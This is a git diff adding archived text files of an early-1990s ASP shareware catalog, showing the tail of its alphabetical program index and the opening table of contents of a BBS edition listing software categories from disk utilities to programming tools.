+ DAYO TIME & BILLING 173, Dr. Motes' Colorbook 308, + 410 416 + DB2DOC 152, 402 DRAFT CHOICE 309, 411 + DB2PRG 152, 402 DrawSome 281, 413 + dbDIAL(tm) 85, 399 DressMeUp 389, 408 + dBF-View 150, 416 dtSearch 147, 424 + Decision Analysis 236, 401 Dueling Dragons 364, 408 + Decision Analysis(PC) 237, Dupes 27, 400 + 401 Duplicate File Locator + Decoder! 125, 434 (DFL) 15, 430 + DialThat 82, 421 + + Index 494 + + + + Duplicate File Manager 8, FCOMP 38, 434 + 400 FDplot 286, 433 + Federal Express Label + E Printer 206, 423 + Early Bird 79, 406 Fictionary 383, 406 + Easy Access 95, 423 FIELD GENERAL 373, 414 + EASY BANKING 222, 433 FILE-MAN 16, 408 + Easy Format 25, 406 FILE PATCH 34, 416 + Easy Project 199, 418 FileFinder 28, 405 + Easydial 83, 418 Filer! 126, 434 + Ecomaster 387, 406 FileXref 273, 408 + EDDY (EDit DirectorY) 16, Find Area Code (FAC) 159, + 422 416 + EDWORD 117, 429 First Expedition 378, 431 + EE 237, 401 FISHBYTE(tm) 339, 435 + EGA Mouse Paint 282, 407 Flex 122, 426 + EGATrek 376, 401 FlexBase 200, 431 + EGAWHEEL 383, 417 FLEXIBAK Plus 31, 399 + ELECTRON 249, 418 FLODRAW 305 + EliteCheck 228, 427 Flow Process 238, 401 + EM Klondike 370, 414 Flow Process(PC) 238, 401 + EM Poker Solitaire 371, Flu_Shot+ 107, 408 + 414 Folders 95, 427 + EM Pyramid 371, 414 FormGen 205, 208, 400 + Enveloper 132, 413 FormGen Business + ENVI-MAN 64, 408 Collection 208, 400 + EQUALIZER 286, 435 FormGen Fill 206, 400 + ESF's DeskJet Fonts & FormGen Home Collection + Utilities 51, 405 208, 400 + ESF's European DeskJet FormGen Utility Pak #1 25, + Fonts 52, 405 400 + ESF's European LaserJet Fortune Teller 349, 425 + Fonts 55, 405 FOURU 8, 402 + ESF's LaserJet Fonts & FPLAN-Captital Needs + Util. 56, 405 Planner 222, 411 + Ethics Awareness 359, 435 FPLAN-Education Funding + EVA 164, 427 Planner 223, 411 + Except 74, 400 FPLAN-Income Protection + EXTENDED BATCH LANGUAGE- Planner 223, 411 + PLUS! 65, 403 FPLAN-Personal Financial + EZ-Reader 161, 162, 404 Plnr 223, 411 + FPLAN-Retirement Planner + F 224, 411 + Family Tree Print Utility Furniture + 346, 425 Equipment Survey(PC) + Fantasy 390, 401 239, 401 + FAST INVOICE WRITER 187, Furniture & Equipment + 418 Survey 238, 401 + FAST STATEMENT WRITER 187, + 418 G + FASTFILE 141, 402 GEMCAP 312, 401 + FASTMAIL 143, 407 Geomancy 358, 425 + fastmenu GOLD 104, 428 Get Lucky! 389, 408 + FBNCAT 12, 415 Getkey/2 65, 400 + + Index 495 + + + + Globally 74, 400 InContext 106, 419 + Globally/2 74, 400 Index! 126, 434 + Gopher's Garden 364, 408 Information about + GRAB Plus(r) 60, 61, 85, copyrights 395, 399 + 399 Information Please 148, + GRAB Plus(r) for Windows 406 + 61, 399 InstaCalc 136, 403 + GRADE BOOK POWER 297, 431 Integrity Master(tm) 108, + Graphical Representation 423 + 239, 401 + Graphical J + Representation(PC) 240, Japanese Business Culture + 401 209, 435 + GREEN 387, 406 JDIR 18, 412 + JEPRS (Jeepers!) 156, 415 + H JetPilot LaserJet Control + Handicapped See: 56, 416 + Utilities, Special needs Jewel Thief 365, 431 + HandyDOS 17, 433 + Hangman for Students 383, K + 412 KEYTREE TOOLBOX 269, 428 + Hard at Work 360, 425 KEYTREE UTILITIES 263, 428 + Hard Disk Director 105, KICK 160, 406 + 402 KP5 148, 430 + HDM IV - Hard Disk Menu KWIKSTAT 255, 406 + 96, 409 KWIKWRITE 122, 406 + HDTEST 17, 407 + Hearts 369, 404 L + HelpPC Quick Reference LambChop 31, 432 + Utility 259, 429 LAN-LINK 338, 411 + HiMOVE 40, 422 LaserForm 57, 421 + HOME BUDGET MANAGEMENT LASR-MAN 57, 408 + SYSTEM 219, 426 last word 377, 408 + Home Helper 87, 424 LaunchCAD 315, 426 + Home Sales System 211, 432 Launcher 96, 400 + Hotnet 166, 420 Layout 195, 417 + Household Register 321, Layout Planning 240, 401 + 424 Layout Planning(PC) 241, + HouseHold TRACKER 137, 407 401 + How to join as a 'beta' LCD: Led's Change + author 395, 399 Directory 18, 412 + HowTwo 364, 408 LEANER 203, 431 + HUGO II LessonPlanZ 295, 421 + WHODUNIT? 378, 408 LHA 37 + HUGO'S HOUSE OF HORRORS Listico 303, 427 + 379, 408 Lite Format 26, 406 + HyperPAD 273, 420 LiteComm(tm) for Microsoft + HyperSlide 308, 410 C 264, 413 + LiteComm(tm) for Turbo C + I 264, 413 + I.Q. Challenge 377, 425 LiteSPM 115, 413 + IBM PC Author Application Little Black Book 83, 402 + 395, 399 LJ-SLEEVE 57, 435 + ICP 194, 402 LK4.EXE 18, 402 + + Index 496 + + + + Loan Amortization 224, 406 Methods Time Measurement + LOANS & SAVINGS 219, 418 242, 401 + LOGGIT 166, 402 Methods Time + LOGIK MENU 97, 423 Merasurement(PC) 242, + Lotto Challenger 336, 412 401 + LOTTO PROPHET 336, 405 METRIC-X 212, 431 + LOTTO SIMULATOR 337, 426 Mille French Card Game + Lotto Thunder 337, 429 369, 420 + LoveDOS 360, 425 Mom's Math 254, 416 + LQ 47, 409 Money Smith 225, 427 + LQMATRIX 50, 421 MORFORM 207, 416 + MORSOFT CALCULATOR 76, 416 + M MORTGAGE MISER 225, 431 + MacIntosh Author MouseTools 277, 401 + Application 396, 399 Mover 9, 400 + Magic Brush & Magic Show Movie Guide 330, 426 + 306, 417 Multi-level Pull-down + Mah Jongg--Solitaire 361, Menus 264, 269, 413 + 401 Multi-level Virtual + Maillist / M-Label 144, Windows 270, 413 + 425 Multi-level virtual + MakeDemo 167, 417 windows 265, 413 + Maker 272, 400 MULTIFILE-XL 144, 418 + Man/machine Process 241, Multilevel Marketing + 401 Simulator 210, 424 + Man/Machine Process(PC) Music Manager for Windows + 241, 401 322, 434 + Mass-Store Copy 32, 422 MuziTrak System 347, 427 + Master Meal Manager 334, My Little Realm 226, 432 + 434 + MathAttack 254, 418 N + MAXI Form 26, 407 NAMEBASE 201, 433 + MaxMan 365, 408 NAMEGRAM 384, 420 + Mayan Calendar 350, 425 Names & Dates 88, 419 + MAZE3 374, 423 NDOS See: Utilities, + MCGA utilities See: Software tools, For 4DOS + Utilities, Hardware NED 117, 432 + utilities, Screen NEWBIZ 131, 434 + utilities, EGA/VGA Newkey 41, 402 + MegaHost 165, 414 Nifty James' RAM Disk 40, + Melissa's Music Flashcards 403 + 347, 407 Nifty James's File Finder + MEMORY 369, 421 19, 403 + Memory utilities See: Nine Men's Morris 388, 412 + Utilities, Hardware NJ's File Finder for + utilities, CPU & memory Windows 19, 403 + utilities Norton's NDOS See: + MENU ACE 97, 427 Utilities, Software + MENU-MAN 66, 408 tools, For 4DOS + MenuDIRECT Gold 105, 405 NPS - Nominal Pipe Size + MenuEase 98, 408 252, 407 + Mercury 254, 421 + MERIT BADGE TRACKER 342, O + 430 Oak Hill Vi(tm) 118, 412 + + Index 497 + + + + OffLoad 35, 415 OutFox 362, 408 + OMNIDay 92, 421 Over_LAZ 58, 407 + OMNIDiZk 12, 421 Over_LAZ PS 59, 407 + OMNIMeal 334, 421 Overhead Cost 244, 401 + On This Day 298, 430 Overhead Cost(PC) 245, 401 + Operation Process 243, 401 + Operation Process(PC) 243, P + 401 PACE 123, 424 + Operator Process 243, 401 PACK TRACKER 343, 430 + Operator Process(PC) 244, PAGE COUNT 121, 428 + 401 Painless Accounting 174, + Optical character 418 + recognition See: Painless Acct/Payroll + Graphics, Business Companion 175, 418 + applications, OCR Painless Event Processor + applications 66, 418 + ORGANIZE 80, 419 Painless Menu Manager 98, + ORGANIZE! Jazz Collection 418 + 322, 410 Painless Payroll 190, 418 + ORGANIZE! Memorabilia 323, Paint Shop Pro 311, 424 + 410 PAK 35, 422 + ORGANIZE! Professional PALERT 66, 418 + Books 204, 410 Pallanda 362, 408 + ORGANIZE! Your Art 323, PARTY TRACKER 202, 430 + 410 PATH-MAN 67, 408 + ORGANIZE! Your Books/ PathProj 256, 417 + Magazines 324, 410 PATIENCE 10 371, 404 + ORGANIZE! Your CDs & PATTR 28, 418 + Records 324, 410 PAYMENT BOOK WRITER 232, + ORGANIZE! Your Coin 418 + Collection 324, 410 PBfmt 261, 420 + ORGANIZE! Your Comic Books PBMouse 261, 406 + 325, 410 PBWindows 262, 406 + ORGANIZE! Your Fabrics PC-AP Accounts Payable + 353, 410 175, 415 + ORGANIZE! Your Guns 325, PC-AR Accounts Receivable + 410 188, 415 + ORGANIZE! Your Home 353, PC-CAI 299, 406 + 410 PC Canary 108, 421 + ORGANIZE! Your Model PC Chart (CGA/HGC) 215, + Railroad 326, 410 430 + ORGANIZE! Your Plants/ PC-CHART (EGA/VGA) 216, + Garden 328, 410 430 + ORGANIZE! Your Sports PC-DEAL 175, 414 + Cards 326, 410 PC-Draft-CAD 309, 401 + ORGANIZE! Your Stamp PC-Draft II 307, 401 + Collection 327, 410 PC-ECAP 250, 424 + ORGANIZE! Your Video Tapes PC-FasType/CGA 294, 413 + 330, 410 PC-FasType/MONO 294, 413 + OS/2-specific software 22, PC-FOOD 176, 421 + 29, 36, 39, 65, 74, 107, PC-GL General Ledger 176, + 276, 293 415 + Ounce Of Prevention 107, PC-GLOSSARY 289, 407 + 414 PC-HAM 338, 411 + + Index 498 + + + + PC-INFO 71, 420 Prgmr's Productivity Pack + PC-Names 145, 419 Lite 260, 406 + PC-PR Payroll Writing 191, Print-it 44, 412 + 415 PrintCAD 44, 419 + PC-STRAN(tm) 251, 415 PrintEnvelope 61, 433 + PC SYSTEM MANAGER 98, 416 PrinterBUDDY 48, 433 + PC-TRACK 318, 434 PrintGL 45, 419 + PCBRIDGE(tm) 251, 415 PrintPlus 45, 399 + PCBUDGET 226, 415 PRO-CR 310, 408 + PCCLOCK 82, 400 PRO$TOCK 216, 427 + PCFDial 84, 399 Probat 68, 424 + PCForm 205, 404 ProDev*EPRICE 196, 400 + PCINV Invoice Writing 177, ProDev*MEMBER 357, 400 + 415 ProDev*QUOTE 196, 400 + PCM100.COM 168, 404 ProDev*QUOTE Utility + PCOPY 20, 418 Programs 196, 400 + PCStat 256, 427 Professional Master Key + PDAILY 67, 418 21, 428 + PDEL 20, 418 Programmer's Productivity + pE - The 'perfect' Pack 260, 406 + Editor(tm) 118, 420 Programmer's SUPER-MAINT + pEDIT PLUS 119, 417 272, 400 + PEG 390, 406 PROPLUS 164, 427 + Peronal Record Keeper 354, PS-SLEEVE 59, 435 + 405 PS-TEXT 60, 435 + Personal Calendar (PC) for PSEARCH 21, 418 + DOS 88, 400 PTOUCH 22, 418 + Personal Golf Tracker 340, Public Address 146, 433 + 428 PullDown SAA Menu Shell + Personal Tarot 350, 425 99, 409 + Personal Time Card 91, 407 PURGE 316, 433 + PIANOMAN 348, 420 PUTMAIL 274, 430 + PixFolio Image Catalog + System 13, 431 Q + PKZIP 36, 161 Q&A Study Aid 296, 406 + Plain Vanilla Labels 145, Q4Tool 262, 404 + 404 Qanalyst 166, 399 + Play 'n' Learn 281, 410 QEDIT 28 + Plot-Line 253, 401 QEdit(R) Advanced 119, 415 + PlotManager 310, 410 QFiler 103, 407 + PM2LINO 59, 435 QFont 58, 407 + PMZIP 36, 414 QPACS 229, 426 + Poetry Generator 131, 425 QQUERY (All Fox versions) + Point & Shoot Backup/ 153, 402 + Restore 32, 405 QQUERY (FoxBASE+ 2.10 + Point & Shoot Home Manager version) 153, 402 + 227, 405 QQUERY (FoxPro 1.02 + Pool Manager 340, 412 version) 154, 402 + PopDBF 150, 403 QQUERY (FoxPro 2.0 + PostCardMaster 145, 421 version) 154, 402 + PowerBatch Compiler 68, Quilt 316, 406 + 409 quotations 106 + PPRINT 48, 418 QWIK Screen Utilities 270, + PREP 300, 428 413 + + Index 499 + + + + QWIK Screen Utilities for Show Partner Lite 304, 420 + C 265, 413 Shredder/2 107, 400 + Simply Help! 278, 418 + R Simply Labels 397, 418 + RAM utilities See: SlideManager 316, 410 + Utilities, Hardware SLIM 37, 409 + utilities, CPU & memory Sloop Manager 99, 427 + utilities Smart10 329, 403 + Ravitz Editor 120, 419 Smart Home Shopper 335, + RECALL 134, 418 424 + Recap 149, 425 SNAP! 149, 411 + Recon(tm) 170, 422 SOFF BALLS 341, 406 + Recursive Realm 255, 411 Soft fonts See: Utilities, + ReNamer 274, 408 Printer utilities + Renamer 22, 400 Softball Coach 341, 430 + Renamer/2 22, 400 SoundZ 327, 421 + Resident Task Manager 89, Space Relationship 245, + 425 401 + Restore See: Utilities, Space Relationship(PC) + File utilities, Backup/ 246, 401 + restore Spell Games 283, 406 + retail software 106 Spider Web 366, 408 + Retailer 195, 414 Spin Wall 366, 408 + REXL-Lazarillo de Tormes SR-Info 137, 415 + 288, 429 SST: the Supersonic Search + Richard Webster Programs Tool 23, 412 + 351, 425 Stable - Technical Graphs + RIE - Rimrock Icon Editor 217, 428 + 275, 403 STACKEY 42, 422 + RoDrones 373, 408 STAFF-BASE 138, 416 + Room 9, 400 STAFF-DBMS-PRODUCT-FAMILY + Rosewood Journal 178, 404 138, 416 + Rubicon Publisher 127, 402 STAFF-DEVELOPER 397, 416 + RXridge 257, 417 STAFF-DIAL 84, 416 + RXtraces 257, 417 STAFF-GRAF 304, 416 + STAFF-INTEGRATOR 100, 416 + S STAFF-KICK 139, 416 + SAFEPACK 9, 434 STAFF-MASK 139, 416 + Save the Planet 298, 432 STAFF-REPORT 156, 416 + Savings Account Management STAFF-UTIL 151, 416 + Prg. 227, 418 Stamper 33, 400 + School-Mom 301, 416 STARTREK the Computer + See Mail 164, 430 Program 376, 411 + SeedMaster 356, 417 Statistical 246, 401 + Sell More Software 211, Statistical(PC) 247, 401 + 429 STRG String Processing + Serial++ Asynch Comm Routines 10, 413 + Library 268, 430 Stringer/2 293, 400 + Service Business Design Strudle 307, 408 + 201, 435 STS26 285, 413 + SHERLOCK 38, 402 Super StarTrek 376, 408 + Shez 28, 36, 405 SuperFly 367, 401 + SHIP TRACKER 343, 430 SURVEY POWER 257, 431 + Shooting Gallery 366, 401 Swap! 127, 434 + + Index 500 + + + + SWAPDOS 41, 419 TiltMaze 367, 408 + SWAPDS 112, 419 Time is Money 189, 421 + SWAPLM 113, 419 TimeStax 189, 410 + SWAPMM 114, 419 TimeTrac 197, 421 + SWAPNG 113, 419 Tolman Dental Program 203, + SWAPSK 110, 419 433 + SWAPTN 115, 419 Total Control 168, 420 + SwimBase 342, 425 Total Investor for 1-2-3 + Systems Manager 202, 415 217, 410 + Total Investor for + T Symphony 218, 410 + T-Zero 379, 405 TOUCH TYPE TUTOR 294, 408 + Tag! 128, 434 TRAINING TRACKER 343, 430 + Takin' Care of Business! TransferTIME (TTIME) 171, + AP 178, 409 428 + Takin' Care of Business! TreeTop 103, 411 + AR 179, 409 TriAxis 362, 408 + Takin' Care of Business! TRIG-IT & GEO-DIM 247, 418 + GL 179, 409 TrikTrak 91, 420 + Takin' Care of Business! Trojan horse See: + IN 180, 409 Utilities, Security + Takin' Care of Business! programs + M&C 180, 409 TROOP TRACKER 344, 430 + Takin' Care of Business! TSR Download 46, 405 + PR 181, 409 TUTOR.COM 293, 422 + Takin' Care of Business! + PS 181, 409 U + TAPCIS 162, 170, 425 UDECIDE 197, 406 + TAX91 220, 403 Utility_Belt 69, 407 + TCXL User Interface + Development 266, 419 V + TDisplay 39, 434 Value Engineering 247, 401 + TEACHER 287, 428 Value Engineering(PC) 248, + Tear Down the Wall 388, 401 + 412 VAR Grade 297, 419 + Technical Editor 120, 420 VERSAMAP 301, 405 + TechnoJock's Object VGA utilities See: + Toolkit 271, 401 Utilities, Hardware + TechnoJock's Turbo Toolkit utilities, Screen + 271, 401 utilities, EGA/VGA + TesSeRact Compression VGAWHEEL 384, 417 + System 266, 419 VIDEO BUFF 331, 407 + TesSeRact File Management Video Librarian 331, 424 + 266, 419 VIDEOCAT 332, 410 + TesSeRact Printer Control VideoMaster 332, 421 + 267, 419 VINO:FILE Cellar Master + TesSeRact Screen Designer 328, 404 + 267, 419 VMiX 386 62, 403 + TesSeRact TSR Devel. Volcano Hunter 379, 422 + System 267, 419 Volume + TextCon 129, 426 Hours & Productivity + TextOut/5 129, 426 248, 401 + Textshot 73, 435 Hours & Productivity(PC) + Tikler 90, 417 249, 401 + + Index 501 + + + + Vortex 367, 408 WorkQueue 199, 405 + WORLD29 302, 413 + W World Name Game 284, 413 + WAMPUM 140, 417 World's Simplest Computer + WEBS 388, 406 290, 412 + What's Up(tm) 81, 417 + WHATS-UP 339, 411 X + WinBatch 69, 426 XDIR 23, 425 + WinCheck 227, 426 XPENS 182, 426 + Window BOSS & Data Clerk XRS ('eXpress Response + 268, 416 System') 169, 419 + Windows-specific software + 13, 19, 37, 53, 61, 69, Y + 75, 86, 91, 95, 99, 104, YieldBook 231, 432 + 121, 125, 132, 133, 217, Your ESP Test 351, 425 + 225, 227, 311, 317, 322, Your Numerologist 354, 420 + 365, 370, 381, 385 YRWAY 287, 428 + WinEdit 121, 426 YRWAYx.ZIP 287, 428 + WinPost 75, 409 + WINWHEEL 385, 417 Z + WinZip 37, 414 ZapCode Pro Printer + WOPR-WinWord Office POWER Control 48, 416 + Pack 132, 413 Zephyr 140, 417 + WordMaster 124, 406 ZiPaper 317, 424 + WORDSEARCH POWER 385, 431 ZPAY 3 192, 399 + WordZ 333, 421 ZZT Arcade-Adventure Game + Workbase 155, 425 368, 423 + \ No newline at end of file diff --git a/textfiles.com/computers/asp5301.txt b/textfiles.com/computers/asp5301.txt new file mode 100644 index 00000000..819dba24 --- /dev/null +++ b/textfiles.com/computers/asp5301.txt @@ -0,0 +1,28476 @@ + + i + + + + + + Contents + + + ASP Shareware Catalog for BBS users 2 + + Chapter 1: How to read this catalog 3 + 1.1 Minimum requirements . . . . . . . . . . . . 3 + 1.2 Registration benefits . . . . . . . . . . . . 4 + 1.3 Sample product description . . . . . . . . . 5 + + Chapter 2: Utilities 7 + 2.1 Disk utilities . . . . . . . . . . . . . . . 7 + 2.1.1 Disk cataloging . . . . . . . . . . . . 9 + 2.1.2 Hard disk utilities . . . . . . . . . . 12 + 2.1.3 Floppy disk utilities . . . . . . . . . 23 + 2.2 File utilities . . . . . . . . . . . . . . . 26 + 2.2.1 Backup/restore . . . . . . . . . . . . . 28 + 2.2.2 Encryption & security . . . . . . . . . 32 + 2.2.3 File archivers . . . . . . . . . . . . . 34 + 2.2.4 File comparison . . . . . . . . . . . . 37 + 2.2.5 File conversion . . . . . . . . . . . . 38 + 2.2.6 File viewers . . . . . . . . . . . . . . 40 + 2.3 Hardware utilities . . . . . . . . . . . . . 40 + 2.3.1 CPU & memory utilities . . . . . . . . . 40 + 2.3.2 Keyboard utilities . . . . . . . . . . . 41 + 2.3.3 Screen utilities . . . . . . . . . . . . 43 + 2.3.3.1 EGA/VGA . . . . . . . . . . . . . . 43 + 2.3.4 286/386/486 utilities . . . . . . . . . 43 + 2.4 Printer utilities . . . . . . . . . . . . . . 44 + 2.4.1 Printer control . . . . . . . . . . . . 47 + 2.4.2 Bar codes . . . . . . . . . . . . . . . 49 + 2.4.3 Printer specific . . . . . . . . . . . . 50 + 2.4.3.1 Epson . . . . . . . . . . . . . . . 50 + 2.4.3.2 HP DeskJet . . . . . . . . . . . . 50 + 2.4.3.3 HP LaserJet . . . . . . . . . . . . 54 + 2.4.3.4 PostScript . . . . . . . . . . . . 61 + 2.4.4 Envelope addressers . . . . . . . . . . 63 + 2.5 System Utilities . . . . . . . . . . . . . . 66 + 2.5.1 Operating systems . . . . . . . . . . . 66 + 2.5.2 Multi-OS utilities . . . . . . . . . . . 66 + 2.5.3 Command processors . . . . . . . . . . . 67 + 2.5.4 Batch & macro utilities . . . . . . . . 68 + 2.5.5 Configuration utilities . . . . . . . . 74 + 2.5.6 Recovery utilities . . . . . . . . . . . 77 + 2.5.7 Screen capture . . . . . . . . . . . . . 77 + 2.5.8 Other . . . . . . . . . . . . . . . . . 78 + 2.6 Desktop utilities . . . . . . . . . . . . . . 80 + 2.6.1 Multi-function . . . . . . . . . . . . . 80 + 2.6.2 Calculators . . . . . . . . . . . . . . 81 + 2.6.3 Calendars . . . . . . . . . . . . . . . 83 + 2.6.4 Clocks . . . . . . . . . . . . . . . . . 87 + 2.6.5 Phone dialers . . . . . . . . . . . . . 88 + + ii + + + + 2.6.5.1 Rolodex programs . . . . . . . . . 90 + 2.6.6 Alarms . . . . . . . . . . . . . . . . . 91 + 2.6.7 Notepads . . . . . . . . . . . . . . . . 91 + 2.6.8 Personal information managers (PIMs) . . 92 + 2.6.9 Time management . . . . . . . . . . . . 96 + 2.6.10 Journal/diary programs . . . . . . . . 98 + 2.7 Menu systems & file managers . . . . . . . . 99 + 2.7.1 Menu systems . . . . . . . . . . . . . . 99 + 2.7.2 File managers . . . . . . . . . . . . 108 + 2.7.3 Combined MS/FMs . . . . . . . . . . . 112 + 2.7.4 MS/FMs for developers . . . . . . . . 114 + 2.7.5 Work environment managers . . . . . . 114 + 2.8 Security programs . . . . . . . . . . . . . 115 + 2.8.1 Virus/Trojan detectors . . . . . . . . 117 + 2.8.2 Virus cleanup/removal . . . . . . . . 118 + 2.8.3 System activity monitors . . . . . . . 118 + 2.8.4 File integrity monitors . . . . . . . 118 + 2.9 Software tools . . . . . . . . . . . . . . 119 + 2.9.1 For multiple programs . . . . . . . . 119 + 2.9.2 For Sidekick . . . . . . . . . . . . . 119 + 2.9.2.1 Sidekick Plus specific . . . . . 120 + 2.9.3 For PC Tools . . . . . . . . . . . . . 121 + 2.9.3.1 Deluxe Shell specific . . . . . . 121 + 2.9.4 For 4DOS . . . . . . . . . . . . . . . 121 + 2.9.5 For Lotus . . . . . . . . . . . . . . 123 + 2.9.6 For Norton . . . . . . . . . . . . . . 124 + 2.9.6.1 For Norton Guides . . . . . . . . 124 + 2.9.6.2 For Norton Utilities . . . . . . 124 + 2.9.7 For PKWARE . . . . . . . . . . . . . . 124 + 2.9.7.1 For PKZIP/PKUNZIP . . . . . . . . 124 + 2.9.8 For other . . . . . . . . . . . . . . 125 + 2.10 Other . . . . . . . . . . . . . . . . . . 126 + + Chapter 3: Writing applications 127 + 3.1 Text editors . . . . . . . . . . . . . . . 127 + 3.2 Text organizers . . . . . . . . . . . . . . 132 + 3.3 Word processors . . . . . . . . . . . . . . 133 + 3.4 Desktop publishing . . . . . . . . . . . . 135 + 3.5 File format translators . . . . . . . . . . 139 + 3.6 Dictionaries . . . . . . . . . . . . . . . 141 + 3.7 Document boilerplates . . . . . . . . . . . 141 + 3.7.1 Business specific . . . . . . . . . . 141 + 3.8 Creativity & brainstorming . . . . . . . . 142 + 3.9 Software tools . . . . . . . . . . . . . . 144 + 3.9.1 For multiple programs . . . . . . . . 144 + 3.9.2 For Word . . . . . . . . . . . . . . . 144 + 3.9.2.1 Word for Windows . . . . . . . . 144 + 3.9.3 For WordPerfect . . . . . . . . . . . 145 + 3.9.4 For other . . . . . . . . . . . . . . 145 + 3.10 Other . . . . . . . . . . . . . . . . . . 147 + + Chapter 4: Spreadsheet applications 148 + 4.1 Spreadsheet programs . . . . . . . . . . . 148 + 4.2 Boilerplates/templates . . . . . . . . . . 149 + + iii + + + + 4.3 Software tools . . . . . . . . . . . . . . 150 + 4.3.1 For multiple programs . . . . . . . . 150 + 4.3.2 For Lotus . . . . . . . . . . . . . . 150 + 4.4 Other . . . . . . . . . . . . . . . . . . . 150 + + Chapter 5: Database applications 150 + 5.1 Relational database managers . . . . . . . 150 + 5.2 Flat-file database managers . . . . . . . . 155 + 5.3 Mailing label systems . . . . . . . . . . . 158 + 5.4 File format translators . . . . . . . . . . 162 + 5.5 Freeform/text database managers . . . . . . 163 + 5.6 Keypunch programs . . . . . . . . . . . . . 164 + 5.7 Database utilities . . . . . . . . . . . . 164 + 5.8 Software tools . . . . . . . . . . . . . . 165 + 5.8.1 For multiple programs . . . . . . . . 165 + 5.8.2 For dBASE . . . . . . . . . . . . . . 166 + 5.8.2.1 dBASE III specific . . . . . . . 166 + 5.8.3 For FoxPro/FoxBASE+ . . . . . . . . . 168 + 5.8.4 For other . . . . . . . . . . . . . . 171 + 5.9 Other . . . . . . . . . . . . . . . . . . . 172 + + Chapter 6: Data 174 + 6.1 Words . . . . . . . . . . . . . . . . . . . 174 + 6.2 Mapping data . . . . . . . . . . . . . . . 174 + 6.3 Marketing data . . . . . . . . . . . . . . 174 + 6.3.1 Shareware specific . . . . . . . . . . 174 + 6.4 World facts . . . . . . . . . . . . . . . . 174 + 6.5 Area codes . . . . . . . . . . . . . . . . 175 + 6.6 Software tools . . . . . . . . . . . . . . 175 + 6.6.1 For other . . . . . . . . . . . . . . 175 + 6.7 Other . . . . . . . . . . . . . . . . . . . 176 + + Chapter 7: Communications 177 + 7.1 General purpose modem communications . . . 177 + 7.2 Service-specific programs . . . . . . . . . 178 + 7.2.1 For CompuServe . . . . . . . . . . . . 178 + 7.2.2 For GEnie . . . . . . . . . . . . . . 179 + 7.2.3 For Prodigy . . . . . . . . . . . . . 180 + 7.2.4 For MCImail . . . . . . . . . . . . . 180 + 7.3 Bulletin board software . . . . . . . . . . 181 + 7.3.1 Bulletin board utilities . . . . . . . 181 + 7.4 Call logging & analysis software . . . . . 182 + 7.4.1 Phone bill analyzers . . . . . . . . . 183 + 7.5 Modem-based graphics applications . . . . . 184 + 7.6 File format translators . . . . . . . . . . 184 + 7.7 File transfer protocols . . . . . . . . . . 184 + 7.8 Fax software . . . . . . . . . . . . . . . 185 + 7.9 Terminal emulators . . . . . . . . . . . . 186 + 7.10 Communication utilities . . . . . . . . . 186 + 7.11 Software tools . . . . . . . . . . . . . . 187 + 7.11.1 For multiple programs . . . . . . . . 187 + 7.11.2 For TAPCIS . . . . . . . . . . . . . 187 + 7.11.3 For Wildcat! . . . . . . . . . . . . 188 + 7.11.4 For PCBoard . . . . . . . . . . . . . 188 + + iv + + + + 7.11.5 For Qmodem . . . . . . . . . . . . . 188 + 7.11.6 For other . . . . . . . . . . . . . . 188 + 7.12 Other . . . . . . . . . . . . . . . . . . 188 + + Chapter 8: Business 190 + 8.1 Business finances . . . . . . . . . . . . . 190 + 8.1.1 Business accounting . . . . . . . . . 191 + 8.1.2 Point-of-sale systems . . . . . . . . 201 + 8.1.3 Billing systems . . . . . . . . . . . 205 + 8.1.4 Purchase order systems . . . . . . . . 209 + 8.1.5 Payroll systems . . . . . . . . . . . 210 + 8.2 Inventory systems . . . . . . . . . . . . . 212 + 8.3 Equipment use & maintenance . . . . . . . . 216 + 8.4 Project bidding & costing . . . . . . . . . 216 + 8.4.1 Decision analysis tools . . . . . . . 218 + 8.5 Project management . . . . . . . . . . . . 219 + 8.6 Client management . . . . . . . . . . . . . 221 + 8.7 Specific-field systems . . . . . . . . . . 224 + 8.7.1 Medical & dental . . . . . . . . . . . 224 + 8.7.2 Real estate . . . . . . . . . . . . . 225 + 8.7.3 Library . . . . . . . . . . . . . . . 226 + 8.7.4 Legal & law enforcement . . . . . . . 226 + 8.8 File format translators . . . . . . . . . . 226 + 8.9 Forms generators . . . . . . . . . . . . . 227 + 8.9.1 Forms fillers . . . . . . . . . . . . 228 + 8.9.2 Forms processing . . . . . . . . . . . 229 + 8.9.3 Forms collections . . . . . . . . . . 230 + 8.10 Sales aids . . . . . . . . . . . . . . . . 230 + 8.11 Marketing . . . . . . . . . . . . . . . . 231 + 8.12 Work-at-home . . . . . . . . . . . . . . . 233 + 8.13 Training aids . . . . . . . . . . . . . . 234 + 8.14 Business utilities . . . . . . . . . . . . 234 + 8.15 Software tools . . . . . . . . . . . . . . 235 + 8.15.1 For other . . . . . . . . . . . . . . 235 + 8.16 Other . . . . . . . . . . . . . . . . . . 237 + + Chapter 9: Finances 239 + 9.1 Stock trading & analysis . . . . . . . . . 239 + 9.2 Personal finances . . . . . . . . . . . . . 242 + 9.2.1 Finances & budgets . . . . . . . . . . 244 + 9.2.2 Checkbook managers . . . . . . . . . . 252 + 9.3 File format translators . . . . . . . . . . 254 + 9.4 Portfolio management . . . . . . . . . . . 254 + 9.5 Finance utilities . . . . . . . . . . . . . 255 + 9.6 Other . . . . . . . . . . . . . . . . . . . 256 + + Chapter 10: Engineering 258 + 10.1 Industrial engineering . . . . . . . . . . 258 + 10.2 Electrical engineering . . . . . . . . . . 275 + 10.3 Civil engineering . . . . . . . . . . . . 277 + 10.4 Structural analysis . . . . . . . . . . . 277 + 10.5 Software tools . . . . . . . . . . . . . . 278 + 10.5.1 For other . . . . . . . . . . . . . . 278 + 10.6 Other . . . . . . . . . . . . . . . . . . 278 + + v + + + + Chapter 11: Mathematics 280 + 11.1 General math . . . . . . . . . . . . . . . 280 + 11.2 Mandelbrot . . . . . . . . . . . . . . . . 281 + 11.3 Statistics . . . . . . . . . . . . . . . . 281 + 11.4 Other . . . . . . . . . . . . . . . . . . 284 + + Chapter 12: Programming 285 + 12.1 CASE tools . . . . . . . . . . . . . . . . 285 + 12.2 Desktop tools for programmers . . . . . . 285 + 12.3 Languages . . . . . . . . . . . . . . . . 287 + 12.3.1 Assembler . . . . . . . . . . . . . . 287 + 12.3.2 BASIC . . . . . . . . . . . . . . . . 287 + 12.3.3 C . . . . . . . . . . . . . . . . . . 289 + 12.3.3.1 C++ . . . . . . . . . . . . . . 294 + 12.3.4 Pascal . . . . . . . . . . . . . . . 294 + 12.3.4.1 OOP Pascal for DOS (Borland) . . 295 + 12.3.5 Other . . . . . . . . . . . . . . . . 296 + 12.4 'Make' utilities . . . . . . . . . . . . . 296 + 12.5 Hypertext/hypermedia . . . . . . . . . . . 297 